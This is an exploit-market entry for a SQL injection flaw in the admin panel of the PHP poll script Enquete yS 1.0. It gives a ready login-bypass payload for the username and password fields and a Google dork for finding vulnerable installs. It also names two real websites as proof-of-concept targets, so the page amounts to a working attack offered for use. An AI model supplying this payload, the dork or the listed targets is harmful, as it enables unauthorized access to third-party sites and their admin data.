[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Enquete yS 1.0 SQL Injection Vulnerability

Author
Hugo Santiago
Risk
[
Security Risk High
]
0day-ID
0day-ID-22228
Category
web applications
Date add
08-05-2014
Platform
php
# Enquete yS - Full v. 1.0 POST SQL Injection in Panel Admin
# Risk: High
# CWE number: CWE-89
# Author: Hugo Santiago dos Santos
# Contact: hugo.s@linuxmail.com
# Date: 08/05/2014
# Vendor Homepage: http://phpbrasil.com/script/AG216GUqK7nS/enquete-ys--full-v-10-yourspotcombr
# Version: v1.0
# Tested on: Windows 7 and Gnu/Linux
# Google Dork: intitle:ys :: Painel
# Url vul : http://host/patch/enquete/admin/
# Exploit:
         Post in parameters txtUsuario & txtSENHA
                 Post exploit = txtUsuario='-&txtSenha='-&btnLogar=Logar+no+sistema+>>
            Username = '- and Password = '-

# PoC : http://www.sercoladm.com.br/adm/enquete/admin/
        http://www.sgnet-rs.com.br/scripts/enquete/admin/

#  0day.today [2024-11-15]  #